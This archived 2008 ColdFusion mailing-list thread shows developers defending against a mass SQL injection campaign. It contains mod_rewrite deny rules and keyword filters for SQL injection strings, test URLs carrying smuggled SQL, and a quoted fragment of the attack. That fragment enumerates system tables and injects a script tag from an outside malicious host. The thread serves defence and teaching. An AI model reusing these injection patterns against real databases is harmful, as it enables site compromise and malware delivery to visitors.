Home of the ColdFusion Community
|
Mailing Lists
|
Home /
Groups /
ColdFusion Talk (CF-Talk)
HELP! SQL Injection Attack!
Author: Jaime Metcher
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310783
If you block APNIC's range you're blocking the whole of the Asia/Pacific
region. APNIC is not an ISP or large company, it's actually the regional
authority for internet addresses, so it owns *all* addresses in Asia/Pacific
- just like ARIN owns all addresses in North America and RIPE owns all
addresses in Europe.
Your lookup is resolving back to APNIC because you're using your regional
authority (in your case ARIN) and it will only resolve addresses in its own
range. For all other addresses it will just refer you to the appropriate
regional authority. If you then use *that* authority's whois, you'll get
the real story.
Oh, and if you try to automate this to look up lots of addresses, you're
breaking the terms of use of the whois server. I'd imagine they'd block
you, but I've never tried it.
Jaime
----- Excess quoted text cut - see Original Post for more -----
Author: Tom Chiverton
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310686
> Just curious as I have no seen this on an old asp site months ago and
> now on CF. Every IP lookup I do goes back to
If it's just a blind SQL injection attempt, the actual sending of the attack
could be from a spoofed IP.
--
Tom Chiverton
****************************************************
This email is sent for and on behalf of Halliwells LLP.
Halliwells LLP is a limited liability partnership registered in England and Wales
under registered number OC307980 whose registered office address is at Halliwells
LLP, 3 Hardman Square, Spinningfields, Manchester, M3 3EB. A list of members is
available for inspection at the registered office. Any reference to a partner in
relation to Halliwells LLP means a member of Halliwells LLP. Regulated by The
Solicitors Regulation Authority.
CONFIDENTIALITY
This email is intended only for the use of the addressee named above and may be
confidential or legally privileged. If you are not the addressee you must not
read it and must not use any information contained in nor copy it nor inform any
person other than Halliwells LLP or the addressee of its existence or contents.
If you have received this email in error please delete it and notify Halliwells
LLP IT Department on 0870 365 2500.
For more information about Halliwells LLP visit
www.halliwells.com.
Author: denstar
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310585
>> RewriteRule .*@.* /security-violation.htm [NC]
>
> Won't that match email address ?
Yup. Don't think I use those in the url or path for anything tho.
Modifying those rules are pretty straight-forward, we'll see how
things go, I reckon.
--
Beware the barrenness of a busy life.
Socrates
Author: Brian Peddle
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310557
Just curious as I have no seen this on an old asp site months ago and
now on CF. Every IP lookup I do goes back to
OrgName: Asia Pacific Network Information Centre
OrgID: APNIC <http://ws.arin.net/whois/?queryinput=O%20%21%20APNIC>;
Address: PO Box 2131
City: Milton
StateProv: QLD
PostalCode: 4064
Country: AU
For ASP I ended up blocking full ranges of ips which helped the issue quicker.
Paul Ihrig wrote:
----- Excess quoted text cut - see Original Post for more -----
Author: Paul Ihrig
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310538
what are you seeing if you limit email to unique IP's?
ours is way down if we do that.
we are just sending unique ip's to one of our GREAT it guys to insert
into ban list in firewall.
should figure out how to auto add remove ip's
----- Excess quoted text cut - see Original Post for more -----
Author: Les Mizzell
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310518
> http://www.actcfug.com/files/_SQLPrev.zip
After putting this on a number of sites in just the last two hours, I am
completely blown away by the number of attacks I'm seeing! Over 2500 in
less than 2 hours on just 3 sites.
My poor mail server can't take all the extra incoming mail!!! I'm going
to have to mod the code to remove the warning email that goes out, and
have it create a log file or something instead!
I have to think to myself - is this payback for baiting all those
Nigerian scammers last week? Oh jezz....
This is unbelievable!
Les
Author: Justin Scott
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310513
> I have to agree with Dave. Every possible client scope needs to be checked -
> and the form scope seems rudimentary to me. Not checking the form scope is
> like setting up a firewall and locking down everything except a few dozen
> ports near the bottom of the stack (after all ... we rarely get attacked
> from ports 10 through 30 :)
I agree you should do input validation on the form scope, but not with
my script. The logic behind it looks for a semi-colon and any SQL
keyword within the same form field. The likelihood that a comments
field or other form field will meet the criteria is too high to use a
blanket keyword scanner like this. I agree that you should validate any
data you're passing to queries, regardless of the variable scope, but
some methods are great for some scopes and not others given the
methodology. The script can be easily modified to check the form scope
as well, but you may see false positives if you do that.
-Justin Scott
Author: Bruce Schuman
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310507
> http://www.gravityfree.com/_sqlprev.cfm.txt
Just want to thank Justin for this script -- and everybody else who
has contributed some very useful information to this
discussion. It's been very helpful.
I cfincluded this script on application.cfm in just three directories
-- and over night, I got 2,600 emails regarding injection attempts.
It's going to be a while before I get cfqueryparam on all my queries,
so I have to do everything I can to stop this stuff at the top
level. It was a relief to see my MS SQL database still clean this
morning, after all that hammering.
So -- what I am wondering is -- there is going to be the next wave of
attack that's going to try something else -- very likely form-based
submissions....
I can get captcha working -- CF8 does that very nicely -- but I am
wondering if something like this initial script can be modified to
scope it for forms.
Maybe take something like that same script, and do something like
<CFIF IsDefined("form.variablename")>protection clause here</CFIF>
for every element in the script ???
Thanks for your patience with these kinda low-level questions. I
been programming in CF since 2.0 -- and I still have code out there
with "ParameterExists" in it -- but this is a one-man self-taught
deal here, and not too sophisticated.
How can we get form protection linked to application.cfm....?
- Bruce
At 06:51 AM 8/8/2008, you wrote:
----- Excess quoted text cut - see Original Post for more -----
Author: Claude Schneegans
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310503
>>100 IPs is hardly any RAM. I'd use 10k entries, just as a starting
number and
scale down if it really becomes an issue.
Another approach would be to store also the date the IP was entered in
the list,
and remove it after a certain number of days.
--
_______________________________________
REUSE CODE! Use custom tags;
See http://www.contentbox.com/claude/customtags/tagstore.cfm
(Please send any spam to this address: piegeacon@internetique.com)
Thanks.
Author: Mark Kruger
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310499
Justin,
I have to agree with Dave. Every possible client scope needs to be checked -
and the form scope seems rudimentary to me. Not checking the form scope is
like setting up a firewall and locking down everything except a few dozen
ports near the bottom of the stack (after all ... we rarely get attacked
from ports 10 through 30 :)
-Mark
> Since nearly all SQL injection attempts come through the URL
> (including the recent ones), that is where I put the focus.
Nearly all automated SQL injection attempts come through the URL. The ones
that, say, compromise peoples' credit card data, they typically come from
forms.
> With this script I would not recommend checking the form scope as
> there is too high a risk of false positives. I've never heard of an
> injection attack coming through CGI variables. I suppose it's
> possible, but the percentage of queries using CGI scope data is
> probably minuscule compared to URL variables.
Again, targeted attacks will attempt to use any data that comes from the
client. A brief review of the available tools for pen testing will show you
that.
Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/
Fig Leaf Software provides the highest caliber vendor-authorized instruction
at our training centers in Washington DC, Atlanta, Chicago, Baltimore,
Northern Virginia, or on-site at your location.
Visit http://training.figleaf.com/ for more information!
Author: Dominic Watson
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310495
All our AOL users (a substantial amount) come through on a single
proxy ip address. We set up ip blacklisting and almost instantly we
had blocked all our aol users (we quickly took down the black
listing).
Something to consider.
Dominic
----- Excess quoted text cut - see Original Post for more -----
Author: Mike Kear
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310492
Just to make sure the finger points in the right place - the minor
mis-spelling that Peter talks about was in a change that I made to
Justin's file so it would work ok on our system. We require mail
server, username and password in any cfmail tag, so i added them and
made a dyslexic typing error.
But anyway the script works a treat when you dont have my misspelling
in it, and in the last 2 hours it's identified more than 1400 hack
attempts.
And yes, Peter, you always need to use CFQUERYPARAM in any queries, if
they're processing any user input. There has been some blogging on
this subject in the last few weeks, with a couple of really good tools
released that will identify queries in your apps that are exposing
risk in this regard.
Cheers
Mike Kear
Windsor, NSW, Australia
Adobe Certified Advanced ColdFusion Developer
AFP Webworks
http://afpwebworks.com
ColdFusion, PHP, ASP, ASP.NET hosting from AUD$15/month
----- Excess quoted text cut - see Original Post for more -----
Author: Peter Tilbrook
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310490
Wondering if SQL in form fields is also a risk. At any rate Justin D. Scott of
GravityFree (jscott@gravityfree.com) released a handy script which you can grab
here:
http://www.actcfug.com/files/_SQLPrev.zip
The original script had a minor mis-spelling bug and I made the keywords
alphabetical in order to make tweaking it easier if you need not use all the
provided keywords (eg: DROP).
My host Mike Kear (mkear@afpwebworks.com) provided this documentation:
THE EXPLOIT:
The attempt is to use url variables to gain access to the MASTER database (they
cant!) or identify VARCHAR, NVARCHAR or CHAR fields in your tables, then add
their own content to Them. The attackers use automated bots to make multiple
attempts on multiple pages. If the attack is successful, at best it changes all
the text fields in a database, at worst, it destroys your database.
THE DEFENCE
There are a number of ways to defend against an attack like this, and we’re doing
all of them.
[A] Deny read or write permissions to the MASTER database and the system tables
to the SQLServer Login that ColdFusion uses to access the datasource. This has
always been the case
[B] Restrict the SQLServer Login that ColdFusion uses to read/write access to
only the database that it needs for that datasource. This has always been the
case, but we’re double checking. This means that if the hackers gain access,
the damage will be contained to one database only, and a weak defence on one site
won’t compromise everyone else.
[C] prevent the attack reaching the database in the first place. This is where
you come in.
Attached is a script (_SQLPrev.cfm ) written by Justin Scott of GravityFree
(jscott@gravityfree.com). It seeks to scan the URL being called, looking for
some specific strings that can be used in this kind of attack. If it finds such
a word, it aborts the page call and sends the user to the home page of the site,
and sends you an email.
I STRONGLY SUGGEST you incorporate this script at the top of your application.cfm
(or if you are using application.cfc, at the start fo your onRequestStart()
method) . IF the page call is not an attack, the page will be slowed by a
millisecond or two. If it IS an attack, it will very likely capture it and
prevent it.
Just to help you focus your attention on this and how real the threat is, while
I have been typing this email, 11 sites am currently watching have received 638
attack attempts, detected and deflected by this script.
HOW TO DEPLOY THE SCRIPT:
[A] alter the cfqueryparam variables at the top of the script to email addresses,
passwords, etc that are appropriate to you.
[B] put the script somewhere on your site
[C] in your application.cfm site include the script ( or in application.cfc
include the script in the onRequestStart() method)
[D] to test the script, go to http://domain.com/index.cfm?id=4;DECLARE() should trigger the
script and you’ll get an email advising you of a hack attempt.
Thanks to both Mike Kear and Justin Scott for making it a bit easier to discern
if our sites are being attacked. Obviously good coding is preferred and touch
wood I am immune so far but will do a full code review to make that gospel!
Author: Tom Chiverton
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310476
> RewriteRule .*@.* /security-violation.htm [NC]
Won't that match email address ?
--
Tom Chiverton
****************************************************
This email is sent for and on behalf of Halliwells LLP.
Halliwells LLP is a limited liability partnership registered in England and Wales
under registered number OC307980 whose registered office address is at Halliwells
LLP, 3 Hardman Square, Spinningfields, Manchester, M3 3EB. A list of members is
available for inspection at the registered office. Any reference to a partner in
relation to Halliwells LLP means a member of Halliwells LLP. Regulated by The
Solicitors Regulation Authority.
CONFIDENTIALITY
This email is intended only for the use of the addressee named above and may be
confidential or legally privileged. If you are not the addressee you must not
read it and must not use any information contained in nor copy it nor inform any
person other than Halliwells LLP or the addressee of its existence or contents.
If you have received this email in error please delete it and notify Halliwells
LLP IT Department on 0870 365 2500.
For more information about Halliwells LLP visit
www.halliwells.com.
Author: Tom Chiverton
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310475
> Exactly, if you are managing a popular enough site, it could happen. At
> least once or twice in a blue moon.
Likewise, you have plenty of other users, losing one isn't a big deal.
--
Tom Chiverton
****************************************************
This email is sent for and on behalf of Halliwells LLP.
Halliwells LLP is a limited liability partnership registered in England and Wales
under registered number OC307980 whose registered office address is at Halliwells
LLP, 3 Hardman Square, Spinningfields, Manchester, M3 3EB. A list of members is
available for inspection at the registered office. Any reference to a partner in
relation to Halliwells LLP means a member of Halliwells LLP. Regulated by The
Solicitors Regulation Authority.
CONFIDENTIALITY
This email is intended only for the use of the addressee named above and may be
confidential or legally privileged. If you are not the addressee you must not
read it and must not use any information contained in nor copy it nor inform any
person other than Halliwells LLP or the addressee of its existence or contents.
If you have received this email in error please delete it and notify Halliwells
LLP IT Department on 0870 365 2500.
For more information about Halliwells LLP visit
www.halliwells.com.
Author: Tom Chiverton
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310474
> It's just plain annoying. What's the point of the attacks? What
> does the attacker get out of it?
Cash.
It's either gaming search results in Google or pushing malware.
--
Tom Chiverton
****************************************************
This email is sent for and on behalf of Halliwells LLP.
Halliwells LLP is a limited liability partnership registered in England and Wales
under registered number OC307980 whose registered office address is at Halliwells
LLP, 3 Hardman Square, Spinningfields, Manchester, M3 3EB. A list of members is
available for inspection at the registered office. Any reference to a partner in
relation to Halliwells LLP means a member of Halliwells LLP. Regulated by The
Solicitors Regulation Authority.
CONFIDENTIALITY
This email is intended only for the use of the addressee named above and may be
confidential or legally privileged. If you are not the addressee you must not
read it and must not use any information contained in nor copy it nor inform any
person other than Halliwells LLP or the addressee of its existence or contents.
If you have received this email in error please delete it and notify Halliwells
LLP IT Department on 0870 365 2500.
For more information about Halliwells LLP visit
www.halliwells.com.
Author: Tom Chiverton
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310473
> based on the idea that
> the bot is probably operating from an innocent infected PC and will
> not be a threat for months,
Oh, it will. Windows users who are infected are probably very unlikely to ever
be cleaned.
> about 100 or so sounds reasonable.
100 IPs is hardly any RAM. I'd use 10k entries, just as a starting number and
scale down if it really becomes an issue.
--
Tom Chiverton
****************************************************
This email is sent for and on behalf of Halliwells LLP.
Halliwells LLP is a limited liability partnership registered in England and Wales
under registered number OC307980 whose registered office address is at Halliwells
LLP, 3 Hardman Square, Spinningfields, Manchester, M3 3EB. A list of members is
available for inspection at the registered office. Any reference to a partner in
relation to Halliwells LLP means a member of Halliwells LLP. Regulated by The
Solicitors Regulation Authority.
CONFIDENTIALITY
This email is intended only for the use of the addressee named above and may be
confidential or legally privileged. If you are not the addressee you must not
read it and must not use any information contained in nor copy it nor inform any
person other than Halliwells LLP or the addressee of its existence or contents.
If you have received this email in error please delete it and notify Halliwells
LLP IT Department on 0870 365 2500.
For more information about Halliwells LLP visit
www.halliwells.com.
Author: Mike Kear
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310472
It's a pity there isnt a way to stop these hackers coming to the site
in the first place. I put Justin's script on some of my sites this
afternoon and my mail box is filling up, drawing my attention to how
many of these bloody attempts there are. Up to now, i've just had it
happening automatically (instead of sending me an email, it was
logging into a database table) and i'd go looking at the table once in
a while to see how it was doing.
It's just plain annoying. What's the point of the attacks? What
does the attacker get out of it? Is it just for the 'attaboy!' when
they get through and wreck a site for as long as it takes to pull the
back up on line? or is there some more malicious reason for doing it?
Cheers
Mike Kear
Windsor, NSW, Australia
Adobe Certified Advanced ColdFusion Developer
AFP Webworks
http://afpwebworks.com
ColdFusion, PHP, ASP, ASP.NET hosting from AUD$15/month
Author: Rizal Firmansyah
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310468
Yup,
that's correct Justin. Just a warning sign though :)
I switch my hosting back in 2003, because the system event though it
gives me my own SQL user/pass
but it actually can see and queries other DB on the same machine (wrong priv).
My current hosting, also allows user to query 3-4 other DB, but i
think those DB are sample templates (northwind etc) - well hopefully :D
My sites are so far so good. Those SQL i got from the webserver log.
I put my own cf_trimvars tag in Application.cfm to translate all
passed parameters.
It makes sure all inputs are safe and won't be executed as command in
SQL server.
Rizal
ColdFusion Custom Tags And More
www.masrizal.com
At 08:54 8/8/2008, you wrote:
----- Excess quoted text cut - see Original Post for more -----
Author: Jeffrey Lemire
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310467
We also have been seeing this attack as well. Most of the SQL statement is in a
hexadecimal format so it seems that using "keyword" filters could potentially be
rendered innocuous (assuming the entire statement is all in hexadecimal).
Why would ColdFusion or MSSQL accept SQL statements formatted as hexadecimal? Is
there a setting/feature to prevent this?
For those that are using IIS v6 & 7, URLScan v3.0 (beta) has been designed to
help with SQL injection attacks as "part" of a comprehensive plan to combat this
"nuisance". The IIS solution would stop the attacks at the IIS level as a 1st or
second line of defense. Something then could be put in place (application.cfc) at
the ColdFusion application level.
http://blogs.technet.com/swi/archive/2008/06/24/new-tools-to-block-and-eradicate-sql-injection.aspx
http://blogs.iis.net/wadeh/archive/2008/06/24/urlscan-v3-0-beta-release.aspx
http://www.microsoft.com/downloads/details.aspx?FamilyId=EE41818F-3363-4E24-9940-321603531989&displaylang=en
BTW: If anyone has a way to determine/catch hexadecimal formatted content through
the URL scope, it would be greatly appreciated!
I would also like to thank everyone for their contributions. The combined
knowledge of everyone has given me greater insight on comabting these attacks :-]
Author: Justin D. Scott
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310466
> Now this is real bad for shared hosting customers.
> Cause even if we protect our sites, that SQL simply
> queries all tables in the SQL server. So, if you
> found your data compromise, the leak may have been
> caused by other sites that are using the same SQL
> machine, duh!
On SQL Server the sysobjects and syscolumns tables are per-database, so any
script that queries those will only see the tables and such for the database
it's running inside of. This particular attack will stay within the
database being queried and not go outside, so if your site is hit with this
attack it's a sure sign that there is a problem in your code somewhere that
let it in.
Given that, I have seen SQL injection attacks that will go try to query the
'master' database on SQL Server, look at the sysdatabases table, and then go
crawl through every database it can get access to (and if it can get to
master, it's a good bet it can get to everything else). Those are the
really nasty ones.
If the hosting company is at all competent, they will have a unique username
and password for each client database (or each client shared among your
databases) which can't access other client databases. Not only does it help
contain SQL injection attacks, it keeps other hosting clients out of your
databases (and you out of theirs).
-Justin Scott
Author: denstar
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310463
I guess I should add that it checks both the file path/URL, and the
query-string, for malicious whatnots.
The file path/URL is probably only needed if you're already using
rewrites. Otherwise you only need the ones with QUERY_STRING,
probably.
Also, I've commented out the "http:" rule, which you can use if people
are submitting those crappy spam URLs to you. I commented it out in
case folks actually pass URLs via URL, although I doubt many do (if
it's even legit for the RFC, which I doubt).
Yeah, that's it, I reckon.
--
By all means, marry. If you get a good wife, you'll become happy; if
you get a bad one, you'll become a philosopher.
Socrates
On Thu, Aug 7, 2008 at 6:38 PM, denstar wrote:
----- Excess quoted text cut - see Original Post for more -----
Author: denstar
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310462
I've cobbled together some stuff for apache that helps a good bit:
Using mod_rewrite, you can at least prevent stuff from getting to CF.
It still hits the webserver, but hey, better there than all the way to
your appserver!
Here's a modded version of some rewrites I found for IIS (MS people
can find it on google, I didn't save the link, sorry!):
RewriteRule .*NVARCHAR.* /security-violation.htm [NC]
RewriteRule .*DECLARE.* /security-violation.htm [NC]
#RewriteRule .*INSERT.* /security-violation.htm [NC]
RewriteRule .*xp_.* /security-violation.htm [NC]
RewriteRule .*@.* /security-violation.htm [NC]
#RewriteRule .*';* /security-violation.htm [NC]
RewriteRule .*EXEC\(@.* /security-violation.htm [NC]
RewriteRule .*sp_password.* /security-violation.htm [NC]
#RewriteRule /security-violation.htm /security-violation.cfm [L]
#RewriteCond %{QUERY_STRING} .*http:\/\/.* [NC]
RewriteRule .* /security-violation.htm
RewriteCond %{QUERY_STRING} .*sp_password.* [NC]
RewriteRule .* /security-violation.htm
RewriteCond %{QUERY_STRING} .*CAST\(.* [NC]
RewriteRule .* /security-violation.htm
RewriteCond %{QUERY_STRING} .*EXEC\(@.* [NC]
RewriteRule .* /security-violation.htm
RewriteCond %{QUERY_STRING} .*DECLARE.* [NC]
RewriteRule .* /security-violation.htm
RewriteRule /security-violation.htm /security-violation.cfm [P,L]
It basically re-directs all them to a CF file called
/security-violation.cfm, for tracking/auditing whatnots, if you so
choose.
You can also change the last line to this:
RewriteRule /security-violation.htm /security-violation.cfm [F]
or something similar (that was off the cuff) to have it respond with
"forbidden" instead.
You can slap that all in one file (security.rewrites.conf or
something) and then Include it in you virtual hosts, or wherever.
The strings are just perl-flavored regular expressions, it's easy to
add/remove stuff if it's too hard or too loose.
Dunno if it will help others, but it's sure helped us out, so here it is.
HIH!
--
By all means, marry. If you get a good wife, you'll become happy; if
you get a bad one, you'll become a philosopher.
Socrates
On Thu, Aug 7, 2008 at 7:56 AM, Kris Jones wrote:
----- Excess quoted text cut - see Original Post for more -----
Author: Rizal Firmansyah
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310461
I tried to decipher the SQL injection which hits my websites thousand
times for this week.
I found this particular code (it's attacking MS SQL):
select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id
and a.xtype='u' and (b.xtype=... or b.xtype=... or b.xtype=... or b.xtype=...)
The remaining code is appending script src="http://jjmaoduo.3322.org/csrss/w.js
to every string columns found in the whole SQL DB.
Now this is real bad for shared hosting customers.
Cause even if we protect our sites, that SQL simply queries all
tables in the SQL server.
So, if you found your data compromise, the leak may have been caused
by other sites that are using the same SQL machine, duh!
Better alert your webhosting company too.
Rizal
ColdFusion Custom Tags And More
http://www.masrizal.com
At 06:37 AM 8/8/2008, you wrote:
----- Excess quoted text cut - see Original Post for more -----
Author: jscott
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310460
By default it will redirect back to the root domain (/), but that can be modified
in the file or
easily changed to a CFABORT as well.
To trigger it for testing you'll need a SQL keyword and a semi-colon in the same
URL variable, for
example...
/product.cfm?id=4;declare()
...would trigger it.
-Justin Scott
------- Original Message -------
From : morchella[mailto:morchella.deliciosa@gmail.com]
Sent : 8/7/2008 6:39:26 PM
To : cf-talk@houseoffusion.com
Cc :
Subject : RE: Re: HELP! SQL Injection Attack!
does Justin's file redirect the intruder?
i tried passing
/products/index.cfm?n1Id=1&FOREIGN=test
but nothing happened
i am including the file in my application.cfm
modified the email & such..
how can i test it
Author: Al Musella, DPM
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310459
I meant to say: Set the deny permission on the system table to the
user that you use to access the database from cf
At 07:27 PM 8/7/2008, you wrote:
>You should set the permissions on the system table so that you can
>not read or write to the system tables. There
Author: Al Musella, DPM
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310458
>Your database contains all its object names in metadata tables, which can be
>queried directly.
It was mentioned last week, but just to re-iterate:
You should set the permissions on the system table so that you can
not read or write to the system tables. There is no need for it, and
by removing access, this particular attack will fail. They would
have to try guessing the table names by trial and error - or if you
help them by displaying the table names in the error message they can
find the tables quickly.
So in your error handling template, never mention the name of the tables.
I started logging and banning the IP addresses.. I logged 2500
IPs and 9027 hack attempts caught.. so each IP address tried an
average of 4 times. Apparently, a single IP address will only try
our site for less than a minute, then they are never seen again.. so
I now ban the most recent 100 IPs. When a new IP attacks, I add it to
the end of an application list..and remove the first item.
Author: morchella
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310455
does Justin's file redirect the intruder?
i tried passing
/products/index.cfm?n1Id=1&FOREIGN=test
but nothing happened
i am including the file in my application.cfm
modified the email & such..
how can i test it
Author: brad
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310456
<div id="Best Monk Theme song impression">
It's a jungle out there.
</div>
----- Excess quoted text cut - see Original Post for more -----
Author: Terry Ford
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310454
We run a very large linux website and have seen such SQL attacks for months now.
However, this recent wave has *really* picked up over the last 48 hours. It
began August 6, and we have logged close to 40,000 attack attempts and counting.
Our code is well protected, and this attack appears to target MSSQL, so we are
not too concerned about the injection. However, if this attack continues to
grow, it could quickly become a DOS situation. Blocking IP addresses is futile.
I count hundreds and hundreds of them originating the attack.
Author: Bruce Schuman
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310453
Just want to chime in on this -- I also stuck Justin's file online,
and in just a few minutes, I had two of these email warnings. Very
helpful for my naive non-parameterized pages. One thing I like about
the email is, it tells me my domain and page of the attack -- and
also the IP address where it came from-- something I just didn't know before.
Now, let's see, you are telling me I have to itemize every variable
in every query -- 180 database tables, 20-100 variables per table,
1000 queries per site, 20 sites, hmmm.....
You were saying something about automation, Brad....? Gotta look
into that.....
Author: Dave Watts
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310448
> Since nearly all SQL injection attempts come through the URL
> (including the recent ones), that is where I put the focus.
Nearly all automated SQL injection attempts come through the URL. The ones
that, say, compromise peoples' credit card data, they typically come from
forms.
> With this script I would not recommend checking the form
> scope as there is too high a risk of false positives. I've
> never heard of an injection attack coming through CGI
> variables. I suppose it's possible, but the percentage of
> queries using CGI scope data is probably minuscule compared
> to URL variables.
Again, targeted attacks will attempt to use any data that comes from the
client. A brief review of the available tools for pen testing will show you
that.
Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/
Fig Leaf Software provides the highest caliber vendor-authorized
instruction at our training centers in Washington DC, Atlanta,
Chicago, Baltimore, Northern Virginia, or on-site at your location.
Visit http://training.figleaf.com/ for more information!
Author: Les Mizzell
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310440
> I just put this on a site for testing purposes - and less than one hour
> later - over 2 dozen emails to me of attack attempts!!!!
6 more from a different IP address while I was typing my original message!!
Unreal!
Author: Les Mizzell
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310436
> http://www.gravityfree.com/_sqlprev.cfm.txt
<div id="best Keanu Reeves imitation">
Dude!!! Whoa!!!
</div>
I just put this on a site for testing purposes - and less than one hour
later - over 2 dozen emails to me of attack attempts!!!!
I've got cfqueryparam on all queries on this site already, but to see
that many attacks almost immediately after installing the script was a
little mind numbing!
Folks, if you don't think this is serious, think
again!
Author: Justin Scott
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310426
> Good effort... It does not check the form scope however - or CGI
Since nearly all SQL injection attempts come through the URL (including
the recent ones), that is where I put the focus. With this script I
would not recommend checking the form scope as there is too high a risk
of false positives. I've never heard of an injection attack coming
through CGI variables. I suppose it's possible, but the percentage of
queries using CGI scope data is probably minuscule compared to URL
variables.
> As has been pointed out, a blacklist function like this one will
> result a good number of false positives for items that are legitimate.
I would replace "will" with "may" in that statement, and then agree.
We've been using this internally for years without any false positives
(yet).
> Also note that not every DB platforms require a semi-colon for
> end of statement. Some of them allow for line breaks for
> example (at least in the default installation).
Ours was designed for SQL Server; perhaps I should have pointed that out
earlier. I'll reiterate against that it's not meant as a guaranteed SQL
injection stopper, just a quick way to provide a first line defense
while you patch up your queries properly.
-Justin Scott
Author: Mark Kruger
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310423
Justin,
Good effort... It does not check the form scope however - or CGI (a rarely
used but still vulnerable scope). As has been pointed out, a blacklist
function like this one will result a good number of false positives for
items that are legitimate. Also note that not every DB platforms require a
semi-colon for end of statement. Some of them allow for line breaks for
example (at least in the default installation).
-Mark
Mark A. Kruger, CFG, MCSE
(402) 408-3733 ext 105
www.cfwebtools.com
www.coldfusionmuse.com
www.necfug.com
> And yes, I'd like to see the URL "loop" script that was offered by
> Justin Scott
I've had many requests for the SQL injection prevention script, so I'm just
going to post a URL directly to the code and release it into the public
domain for anyone interested:
http://www.gravityfree.com/_sqlprev.cfm.txt
-Justin Scott
Author: Brad Wood
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310420
> I must have 100,000 pages I need to protect --
Better get started then. :)
Read about two tools that can make the job easier for you:
http://www.codersrevolution.com/index.cfm/2008/7/24/Announcing-the-first-ever-International-Operation-cfSQLprotect
Whatever stop-gaps or filtering mechanisms you put in place, your final
solution needs to include parameterizing inputs to all your queries.
~Brad
Author: Rebecca Wells
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310421
I'd be interested in seeing this also.
>We have CF5
>and CFMX versions if anyone wants a copy.
>
>
>-Justin Scott
Author: Justin Scott
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310417
> What I'm wondering is a the pros and cons of doing it this way. Does it
> slow down the app checking for this on every page hit? Or do it the old
> fashion way and clean up all the queries. Thoughts?
That depends on what your definition of slow is. On a modern server a
simple check for a specific string anywhere in the URL as you described
isn't going to even show up in speed testing. The code I posted is more
robust and takes a couple ms to run, but unless your server is getting
absolutely hammered the difference in execution time shouldn't be at all
noticeable.
I will emphasize that the front-end URL scanning is meant as a first
line of defense. It will help, but protection on individual queries and
input validation should still be considered best practice going forward,
and implemented on older code if time and budget permit.
-Justin Scott
Author: Justin Scott
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310416
> I must have 100,000 pages I need to protect -- and my primary
> database has something like 180 tables, some of which have more than
> 100 fields. So, I need something I can do quickly. And I got a lot
> to learn about this.
See my previous post regarding this code which can be placed in front of
an application as a stop-gap measure to give you time to patch
everything properly:
http://www.gravityfree.com/_sqlprev.cfm.txt
-Justin Scott
Author: Tim Do
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57221#310415
Thanks for the code, I'm in the processing of cleaning all the query
calls for my client and been seeing lots of posts regarding this sql
injection. There are a couple thousand queries that I have to clean up
but while I'm in the process of cleaning they're getting injected over
and over and over!! So I did something similar to this, not as in
depth, but I added some logic to application.cfm to check
cgi.query_string for parts of the injection script.
What I'm wondering is a the pros and cons of doing it this way. Does it
slow down the app checking for this on every page hit? Or do it the old
fashion way and clean up all the queries. Thoughts?
> And yes, I'd like to see the URL "loop" script that was offered by
Justin Scott
I've had many requests for the SQL injection prevention script, so I'm
just going to post a URL directly to the code and release it into the
public domain for anyone interested:
http://www.gravityfree.com/_sqlprev.cfm.txt
-Justin Scott
Author: Bruce Schuman
